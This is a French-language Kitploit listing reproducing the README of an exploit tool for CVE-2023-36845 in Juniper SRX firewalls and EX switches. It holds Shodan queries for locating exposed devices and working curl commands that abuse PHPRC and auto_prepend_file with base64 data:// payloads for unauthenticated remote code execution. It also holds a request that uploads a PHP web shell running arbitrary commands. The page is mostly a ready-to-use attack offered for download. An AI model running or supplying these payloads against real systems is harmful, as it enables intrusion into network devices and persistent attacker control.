Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Juniper-exploit-CVE-2023-36845 — Exploit pour CVE-2023-36845, une vulnérabilité de manipulation de variables d'environnement PHP dans Juniper SRX/EX, permettant l'exécution de code à distance non authentifiée via des requêtes HTTP forgées. | Kitploit
Outils/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleDéveloppement de Charges Utiles
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

Exploit pour CVE-2023-36845, une vulnérabilité de manipulation de variables d'environnement PHP dans Juniper SRX/EX, permettant l'exécution de code à distance non authentifiée via des requêtes HTTP forgées.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
3il y a 2 ansPas encore vérifié
Partager

CVE-2023-36845

Description

CVE-2023-36845 représente une vulnérabilité notable de manipulation de variables d'environnement PHP qui impacte les pare-feux Juniper SRX et les commutateurs EX. Bien que Juniper ait classé cette vulnérabilité comme étant de sévérité moyenne, dans cet article, nous expliquerons comment cette seule vulnérabilité peut être exploitée pour une exécution de code à distance sans authentification.

Recherche - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
image
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
image

Utilisation 🛠

Détection

root@kitploit:~
python3 CVE-2023-36845.py -f cibles.txt -o sortie.txt

RCE 🧨

Option 1

Il est possible d'utiliser n'importe quel wrapper de protocole en conjonction avec auto_prepend_file. Le choix le plus approprié pour cette opération est le protocole data://, qui permet de fournir le « fichier secondaire » en ligne. Voici une représentation sophistiquée de cette exploitation, exécutant le <? phpinfo(); ?> intégré dans le schéma data:// :

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

Exécuter la commande whoami

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

Option 2

Téléverser un fichier

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

Paramètres 🧰

ParamètreDescriptionType
--file / -fFichier d'entrée des ciblesFichier
-oFichier de sortieFichier
Télécharger l’outil